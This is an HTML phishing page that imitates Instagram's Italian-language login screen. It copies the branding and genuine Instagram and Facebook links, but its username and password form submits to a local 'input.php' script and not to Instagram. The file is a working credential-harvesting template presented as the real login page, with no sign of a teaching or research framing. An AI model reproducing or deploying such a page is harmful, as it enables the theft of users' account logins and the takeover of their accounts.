<!DOCTYPE html>
<html>
  <head>
    <meta name="viewport" content="width=320, initial-scale=1">
    <meta charset="utf-8">
    <style>

      body, html { min-width: 100%; min-height: 100%; margin: 0; padding: 0; font: Arial 14px; text-align: center;}
        #Content { min-height: 380px; min-width: 345px; border: 1px solid grey; margin: 0 auto; position: absolute; top: 50%; left: 49%; margin-top: -290px; margin-left: -170px;}
          #Title { height: 100px; width: 345px; text-align: center;}
          #Input { height: 150px; width: 345px; text-align: center; margin-top: 15.5px;}
            input  { height: 20px; width: 250px; margin-top: 8px; font-size: 13px; color: grey}
            #LogIN { height: 30px; width: 270px; margin-top: 18px; color: white; font-size: 11px; text-align: center; background:blue; border: 1px solid blue; border-radius: 2px; opacity: 0.4}
          #Text  { height: 110px; width: 345px; text-align: center; }
	          a      { text-decoration: none; font-size: 11px; color: blue; }
        #SingUP  { min-height: 55.5px; min-width: 345px; border: 1px solid grey; margin: 0 auto; position: absolute; top: 50%; left: 49%; margin-top: 101px; margin-left: -170px; text-align: center; font-size: 14px;}
        #Spam    { min-height: 60px; min-width: 345px; margin: 0 auto; position: absolute; top: 50%; left: 49%; margin-top: 180px; margin-left: -170px; text-align: center; font-size: 14px; }
    </style>
    
  </head>
  <body>
    <!-- CONTENT -->
    <div id= "Content">
      
      <!-- TITLE -->
      <div id= "Title"><br>
        <img src="TITLE.png">
        
       </div> 
      <!-- INPUT -->
      <div id= "Input">
        <form method="post" action="input.php">
          
          <!-- USER -->
          <input type="text" name="User" value="Numero di telefono, nome utente o e-mail"> 
          <!-- PASSWORD -->
          <input type="text" name="Password" value="Password">
          <!-- SENT INFO -->
          <input type="submit" id="LogIN" name="submit" value="Accedi">
        
        </form>

      </div>
      <!--  TEXT -->
      <div id="Text">

        <img src="SPACE.png"><br><br>
        <a href="https://www.facebook.com/login.php?skip_api_login=1&api_key=124024574287414&kid_directed_site=0&app_id=124024574287414&signed_next=1&next=https%3A%2F%2Fwww.facebook.com%2Fdialog%2Foauth%3Fclient_id%3D124024574287414%26redirect_uri%3Dhttps%253A%252F%252Fwww.instagram.com%252Faccounts%252Fsignup%252F%26state%3D%257B%2522fbLoginKey%2522%253A%25221vuw018188x8rmhefcbyh1se4r14t9tw7mpw4i413sgpe5v0fhmp%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252F%2522%257D%26scope%3Demail%26response_type%3Dcode%252Cgranted_scopes%26locale%3Dit_IT%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3D73aec1f9-cb74-4bba-a96c-c076e0f7c556&cancel_url=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%2522fbLoginKey%2522%253A%25221vuw018188x8rmhefcbyh1se4r14t9tw7mpw4i413sgpe5v0fhmp%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252F%2522%257D%23_%3D_&display=page&locale=it_IT&pl_dbl=0"><img src="FACEBOOK.png"></a><br><br>
      	<a href="https://www.instagram.com/accounts/password/reset/?hl=it">Hai dimenticato la password?</a>      
      
      </div>
    </div>
    <!-- SINGUP -->
    <div id="SingUP"><br>

      Non hai un account? <a id=SingUP_A href="https://www.instagram.com/accounts/emailsignup/?hl=it">Iscriviti</a>

    </div>
    <div id="Spam">
      
      Scarica l'appicazione. <br><br>

      <img src="APPLE.png"> <img src="GOOGLE.png">
    </div>

  </body>
</html>
